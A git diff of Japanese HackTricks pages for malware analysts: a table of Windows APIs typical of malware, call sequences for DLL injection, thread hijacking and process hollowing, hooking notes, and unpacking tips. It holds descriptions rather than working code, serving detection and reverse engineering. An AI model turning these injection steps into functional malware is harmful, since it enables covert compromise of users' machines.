<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
脆弱性を見つけて修正を迅速に行いましょう。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリまで、テックスタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
|
||||
最も重要な脆弱性を見つけて、より早く修正してください。Intruderは攻撃面を追跡し、積極的な脅威スキャンを実行し、APIからウェブアプリ、クラウドシステムまで、あなたの技術スタック全体にわたる問題を見つけます。今日[**無料で試す**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
***
|
||||
|
||||
# 一般的な
|
||||
|
||||
# 一般的な技術
|
||||
|
||||
## ネットワーキング
|
||||
|
||||
|
@ -39,7 +38,7 @@
|
|||
|
||||
## 永続性
|
||||
|
||||
| レジストリ | ファイル | サービス |
|
||||
| Registry | File | Service |
|
||||
| ---------------- | ------------- | ---------------------------- |
|
||||
| RegCreateKeyEx() | GetTempPath() | OpenSCManager |
|
||||
| RegOpenKeyEx() | CopyFile() | CreateService() |
|
||||
|
@ -49,7 +48,7 @@
|
|||
|
||||
## 暗号化
|
||||
|
||||
| 名前 |
|
||||
| Name |
|
||||
| --------------------- |
|
||||
| WinCrypt |
|
||||
| CryptAcquireContext() |
|
||||
|
@ -58,34 +57,34 @@
|
|||
| CryptDecrypt() |
|
||||
| CryptReleaseContext() |
|
||||
|
||||
## アンチ解析/VM
|
||||
## アンチアナリシス/VM
|
||||
|
||||
| 関数名 | アセンブリ命令 |
|
||||
| Function Name | Assembly Instructions |
|
||||
| --------------------------------------------------------- | --------------------- |
|
||||
| IsDebuggerPresent() | CPUID() |
|
||||
| GetSystemInfo() | IN() |
|
||||
| GlobalMemoryStatusEx() | |
|
||||
| GetVersion() | |
|
||||
| CreateToolhelp32Snapshot \[プロセスが実行中かどうかを確認] | |
|
||||
| CreateFileW/A \[ファイルが存在するかどうかを確認] | |
|
||||
| CreateToolhelp32Snapshot \[プロセスが実行中かチェック] | |
|
||||
| CreateFileW/A \[ファイルが存在するかチェック] | |
|
||||
|
||||
## ステルス
|
||||
|
||||
| 名前 | |
|
||||
| Name | |
|
||||
| ------------------------ | -------------------------------------------------------------------------- |
|
||||
| VirtualAlloc | メモリの割り当て(パッカー) |
|
||||
| VirtualProtect | メモリの権限変更(セクションに実行権限を与えるパッカー) |
|
||||
| VirtualAlloc | メモリを割り当てる(パッカー) |
|
||||
| VirtualProtect | メモリの権限を変更する(セクションに実行権限を与えるパッカー) |
|
||||
| ReadProcessMemory | 外部プロセスへのインジェクション |
|
||||
| WriteProcessMemoryA/W | 外部プロセスへのインジェクション |
|
||||
| NtWriteVirtualMemory | |
|
||||
| CreateRemoteThread | DLL/プロセスインジェクション... |
|
||||
| CreateRemoteThread | DLL/プロセスインジェクション... |
|
||||
| NtUnmapViewOfSection | |
|
||||
| QueueUserAPC | |
|
||||
| CreateProcessInternalA/W | |
|
||||
|
||||
## 実行
|
||||
|
||||
| 関数名 |
|
||||
| Function Name |
|
||||
| ---------------- |
|
||||
| CreateProcessA/W |
|
||||
| ShellExecute |
|
||||
|
@ -97,82 +96,81 @@
|
|||
|
||||
* GetAsyncKeyState() -- キーロギング
|
||||
* SetWindowsHookEx -- キーロギング
|
||||
* GetForeGroundWindow -- 実行中のウィンドウ名(またはブラウザのウェブサイト)
|
||||
* LoadLibrary() -- ライブラリのインポート
|
||||
* GetProcAddress() -- ライブラリのインポート
|
||||
* CreateToolhelp32Snapshot() -- 実行中のプロセスのリスト
|
||||
* GetForeGroundWindow -- 実行中のウィンドウ名を取得する(またはブラウザからのウェブサイト)
|
||||
* LoadLibrary() -- ライブラリをインポートする
|
||||
* GetProcAddress() -- ライブラリをインポートする
|
||||
* CreateToolhelp32Snapshot() -- 実行中のプロセスをリストする
|
||||
* GetDC() -- スクリーンショット
|
||||
* BitBlt() -- スクリーンショット
|
||||
* InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- インターネットへのアクセス
|
||||
* FindResource(), LoadResource(), LockResource() -- 実行可能ファイルのリソースへのアクセス
|
||||
* InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- インターネットにアクセスする
|
||||
* FindResource(), LoadResource(), LockResource() -- 実行可能ファイルのリソースにアクセスする
|
||||
|
||||
# マルウェアのテクニック
|
||||
# マルウェア技術
|
||||
|
||||
## DLLインジェクション
|
||||
|
||||
他のプロセス内で任意のDLLを実行します。
|
||||
別のプロセス内で任意のDLLを実行する
|
||||
|
||||
1. 悪意のあるDLLをインジェクションするプロセスを特定します:CreateToolhelp32Snapshot、Process32First、Process32Next
|
||||
2. プロセスを開きます:GetModuleHandle、GetProcAddress、OpenProcess
|
||||
3. プロセス内にDLLのパスを書き込みます:VirtualAllocEx、WriteProcessMemory
|
||||
4. 悪意のあるDLLをロードするプロセス内のスレッドを作成します:CreateRemoteThread、LoadLibrary
|
||||
1. 悪意のあるDLLをインジェクトするプロセスを特定する: CreateToolhelp32Snapshot, Process32First, Process32Next
|
||||
2. プロセスを開く: GetModuleHandle, GetProcAddress, OpenProcess
|
||||
3. プロセス内にDLLへのパスを書き込む: VirtualAllocEx, WriteProcessMemory
|
||||
4. 悪意のあるDLLをロードするスレッドをプロセス内に作成する: CreateRemoteThread, LoadLibrary
|
||||
|
||||
使用する他の関数:NTCreateThreadEx、RtlCreateUserThread
|
||||
他の使用する関数: NTCreateThreadEx, RtlCreateUserThread
|
||||
|
||||
## 反射型DLLインジェクション
|
||||
## リフレクティブDLLインジェクション
|
||||
|
||||
通常のWindows API呼び出しを行わずに悪意のあるDLLをロードします。\
|
||||
DLLはプロセス内にマップされ、インポートアドレスを解決し、リロケーションを修正し、DllMain関数を呼び出します。
|
||||
## スレッドハイジャッキング
|
||||
通常のWindows APIコールを呼び出さずに悪意のあるDLLをロードする。\
|
||||
DLLはプロセス内にマップされ、インポートアドレスを解決し、リロケーションを修正し、DllMain関数を呼び出す。
|
||||
|
||||
プロセスからスレッドを見つけ、悪意のあるDLLを読み込ませる
|
||||
## スレッドハイジャック
|
||||
|
||||
1. ターゲットスレッドを見つける:CreateToolhelp32Snapshot、Thread32First、Thread32Next
|
||||
2. スレッドを開く:OpenThread
|
||||
3. スレッドを一時停止する:SuspendThread
|
||||
4. 悪意のあるDLLのパスを被害者プロセス内に書き込む:VirtualAllocEx、WriteProcessMemory
|
||||
5. スレッドを再開し、ライブラリを読み込む:ResumeThread
|
||||
プロセスからスレッドを見つけ、それに悪意のあるDLLをロードさせる
|
||||
|
||||
1. ターゲットスレッドを見つける: CreateToolhelp32Snapshot, Thread32First, Thread32Next
|
||||
2. スレッドを開く: OpenThread
|
||||
3. スレッドを一時停止する: SuspendThread
|
||||
4. 被害者プロセス内に悪意のあるDLLへのパスを書き込む: VirtualAllocEx, WriteProcessMemory
|
||||
5. ライブラリをロードしてスレッドを再開する: ResumeThread
|
||||
|
||||
## PEインジェクション
|
||||
|
||||
Portable Execution Injection:実行可能ファイルが被害者プロセスのメモリに書き込まれ、そこから実行されます。
|
||||
Portable Execution Injection: 実行可能ファイルは被害者プロセスのメモリに書き込まれ、そこから実行される。
|
||||
|
||||
## プロセスホローイング
|
||||
|
||||
マルウェアはプロセスのメモリから正規のコードをアンマップし、悪意のあるバイナリを読み込みます。
|
||||
マルウェアはプロセスのメモリから合法的なコードをアンマップし、悪意のあるバイナリをロードする
|
||||
|
||||
1. 新しいプロセスを作成する:CreateProcess
|
||||
2. メモリをアンマップする:ZwUnmapViewOfSection、NtUnmapViewOfSection
|
||||
3. 悪意のあるバイナリをプロセスのメモリに書き込む:VirtualAllocEc、WriteProcessMemory
|
||||
4. エントリポイントを設定し、実行する:SetThreadContext、ResumeThread
|
||||
1. 新しいプロセスを作成する: CreateProcess
|
||||
2. メモリをアンマップする: ZwUnmapViewOfSection, NtUnmapViewOfSection
|
||||
3. プロセスメモリに悪意のあるバイナリを書き込む: VirtualAllocEc, WriteProcessMemory
|
||||
4. エントリポイントを設定し、実行する: SetThreadContext, ResumeThread
|
||||
|
||||
# フック
|
||||
# フッキング
|
||||
|
||||
* **SSDT**(**System Service Descriptor Table**)は、カーネル関数(ntoskrnl.exe)またはGUIドライバ(win32k.sys)を指し示し、ユーザープロセスがこれらの関数を呼び出すことができるようにします。
|
||||
* ルートキットはこれらのポインタを制御するアドレスに変更する場合があります。
|
||||
* **IRP**(**I/O Request Packets**)はデータの一部をコンポーネントから別のコンポーネントに転送します。カーネルのほとんどのものはIRPを使用し、各デバイスオブジェクトにはフックできる関数テーブルがあります:DKOM(Direct Kernel Object Manipulation)
|
||||
* **IAT**(**Import Address Table**)は依存関係の解決に役立ちます。このテーブルをフックして呼び出されるコードを乗っ取ることができます。
|
||||
* **EAT**(**Export Address Table**)フック。これらのフックは**ユーザーランド**から行うことができます。目的は、DLLによってエクスポートされた関数をフックすることです。
|
||||
* **インラインフック**:このタイプは実現が難しいです。これには関数自体のコードを変更することが含まれます。たとえば、最初にジャンプを配置することで実現できます。
|
||||
* **SSDT**(**System Service Descriptor Table**)は、ユーザープロセスがこれらの関数を呼び出せるように、カーネル関数(ntoskrnl.exe)またはGUIドライバー(win32k.sys)を指す。
|
||||
* ルートキットはこれらのポインタを自分が制御するアドレスに変更することがある。
|
||||
* **IRP**(**I/O Request Packets**)は、コンポーネント間でデータの断片を伝達する。カーネルのほとんどすべてがIRPを使用し、各デバイスオブジェクトにはフック可能な独自の関数テーブルがある:DKOM(Direct Kernel Object Manipulation)
|
||||
* **IAT**(**Import Address Table**)は依存関係を解決するのに役立つ。このテーブルをフックして、呼び出されるコードをハイジャックすることが可能。
|
||||
* **EAT**(**Export Address Table**)フック。このフックは**ユーザーランド**から行うことができる。目的は、DLLによってエクスポートされた関数をフックすること。
|
||||
* **インラインフック**:このタイプは難しい。これには、関数自体のコードを変更することが含まれる。たとえば、これの始めにジャンプを置くことによって。
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
最も重要な脆弱性を見つけて、より速く修正できるようにしましょう。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリまで、クラウドシステム全体にわたる問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm_source=referral&utm_campaign=hacktricks)。
|
||||
最も重要な脆弱性を見つけて、より早く修正してください。Intruderは攻撃面を追跡し、積極的な脅威スキャンを実行し、APIからウェブアプリ、クラウドシステムまで、あなたの技術スタック全体にわたる問題を見つけます。今日[**無料で試す**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? HackTricksであなたの会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたりしたいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローしてください**。
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,46 +1,50 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- 独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に**参加**するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# パックされたバイナリの特定
|
||||
|
||||
* **文字列の不足**: パックされたバイナリにはほとんど文字列が存在しないことがよくあります。
|
||||
* 多くの**未使用の文字列**: マルウェアが商用パッカーを使用している場合、クロスリファレンスのない多くの文字列が見つかることがよくあります。ただし、これらの文字列が存在しているからといって、バイナリがパックされていないとは限りません。
|
||||
* バイナリのパッカーを特定するために、いくつかのツールを使用することもできます:
|
||||
* **文字列の欠如**: パックされたバイナリにはほとんど文字列がないことが一般的です。
|
||||
* 多くの**使用されていない文字列**: また、マルウェアが商用のパッカーを使用している場合、クロスリファレンスのない多くの文字列が見つかることが一般的です。これらの文字列が存在しても、バイナリがパックされていないとは限りません。
|
||||
* バイナリをパックするために使用されたパッカーを見つけるために、いくつかのツールを使用することもできます:
|
||||
* [PEiD](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml)
|
||||
* [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml)
|
||||
* [Language 2000](http://farrokhi.net/language/)
|
||||
|
||||
# 基本的な推奨事項
|
||||
|
||||
* パックされたバイナリを解析する場合は、**IDAで下から上に**解析を開始します。アンパッカーは、アンパックされたコードが終了すると終了するため、アンパッカーが最初に実行時にアンパックされたコードに実行を渡すことはまれです。
|
||||
* **レジスタ**または**メモリの領域**への**JMP**または**CALL**、または**引数とアドレスの方向をプッシュし、`retn`を呼び出す関数**を検索します。この場合、関数の戻り値は、呼び出される前にスタックにプッシュされたアドレスを呼び出す可能性があります。
|
||||
* `VirtualAlloc`に**ブレークポイント**を設定します。これにより、プログラムがアンパックされたコードを書き込むためのメモリ領域を割り当てることができます。関数を実行した後、"run to user code"またはF8を使用してEAX内の値に到達します。そして、そのアドレスをダンプで**フォロー**します。アンパックされたコードが保存される領域であるかどうかはわかりません。
|
||||
* 引数として値 "**40**" を持つ **`VirtualAlloc`** は、Read+Write+Execute(実行が必要なコードがここにコピーされる)を意味します。
|
||||
* コードをアンパックする間に、**算術演算**や**`memcopy`**または**`Virtual`**`Alloc`のような関数への**複数の呼び出し**が見つかることが普通です。関数が算術演算のみを実行し、おそらくいくつかの`memcopy`を実行するように見える場合、関数の**終わり**(おそらくレジスタへのJMPまたは呼び出し)を見つけるか、少なくとも**最後の関数の呼び出し**を見つけてから実行してください。なぜなら、そのコードは興味がないからです。
|
||||
* コードをアンパックする間に、**メモリ領域の変更**があるたびに**メモ**してください。メモリ領域の変更は、アンパックコードの開始を示す可能性があります。プロセスハッカーを使用して簡単にメモリ領域をダンプすることができます(プロセス→プロパティ→メモリ)。
|
||||
* コードをアンパックしようとする際に、**アンパックされたコードで作業しているかどうかを知るための良い方法**(そのままダンプできる)は、バイナリの**文字列をチェック**することです。ある時点でジャンプを実行し(おそらくメモリ領域を変更)、**追加された文字列が非常に多い**ことに気付いた場合、**アンパックされたコードで作業している**ことがわかります。\
|
||||
ただし、パッカーにすでに多くの文字列が含まれている場合は、単語 "http" を含む文字列の数を確認し、この数が増加するかどうかを確認できます。
|
||||
* メモリ領域から実行可能ファイルをダンプする際には、[PE-bear](https://github.com/hasherezade/pe-bear-releases/releases)を使用して一部のヘッダーを修正することができます。
|
||||
* **IDAで下からパックされたバイナリの分析を** **開始し、上に移動します**。アンパッカーはアンパックされたコードが終了すると終了するので、アンパッカーが最初にアンパックされたコードに実行を渡すことはありません。
|
||||
* **レジスタ**や**メモリの領域**への**JMP**や**CALL**を探します。また、**関数が引数とアドレス方向をプッシュしてから`retn`を呼び出す**場合も探します。その場合、関数のリターンはそれを呼び出す前にスタックにプッシュされたアドレスを呼び出す可能性があります。
|
||||
* `VirtualAlloc`に**ブレークポイント**を設定します。これはプログラムがアンパックされたコードを書き込むことができるメモリのスペースを割り当てます。"ユーザーコードまで実行"を使用するか、関数を実行した後にEAX内の値に**到達するためにF8を使用し**、"**そのアドレスをダンプでフォローする**"。それがアンパックされたコードが保存される領域かどうかはわかりません。
|
||||
* 引数として値"**40**"を持つ**`VirtualAlloc`**は、Read+Write+Execute(実行が必要なコードがここにコピーされる)を意味します。
|
||||
* コードをアンパックする際には、**`memcopy`**や**`Virtual`**`Alloc`のような関数と**算術演算**への**複数の呼び出し**を見つけるのが普通です。もし、算術演算のみを行い、多分いくつかの`memcopy`を行う関数に自分自身を見つけた場合、その関数の**終わりを見つける**(多分いくつかのレジスタへのJMPや呼び出し)か、少なくとも**最後の関数への呼び出し**を見つけて、そこまで実行することをお勧めします。なぜなら、コードは興味深くないからです。
|
||||
* コードをアンパックする際には、**メモリ領域を変更する**たびに注意してください。メモリ領域の変更は、**アンパックコードの開始**を示す可能性があります。Process Hackerを使用して簡単にメモリ領域をダンプできます(プロセス --> プロパティ --> メモリ)。
|
||||
* コードをアンパックしようとするとき、**アンパックされたコードをすでに扱っているかどうか**(そのためにただダンプできる)を知る良い方法は、**バイナリの文字列をチェックする**ことです。もし、ある時点でジャンプ(多分メモリ領域を変更する)を実行し、**はるかに多くの文字列が追加された**ことに気づいたら、**アンパックされたコードを扱っている**と知ることができます。\
|
||||
しかし、パッカーにすでに多くの文字列が含まれている場合は、"http"という単語を含む文字列がどれだけあるかを確認し、この数が増えるかどうかを見ることができます。
|
||||
* メモリの領域から実行可能ファイルをダンプするとき、[PE-bear](https://github.com/hasherezade/pe-bear-releases/releases)を使用していくつかのヘッダーを修正することができます。
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- 独占的な[**NFT**
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,16 +1,14 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**PEASSファミリー**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -24,97 +22,6 @@ source ang/bin/activate
|
|||
pip install angr
|
||||
```
|
||||
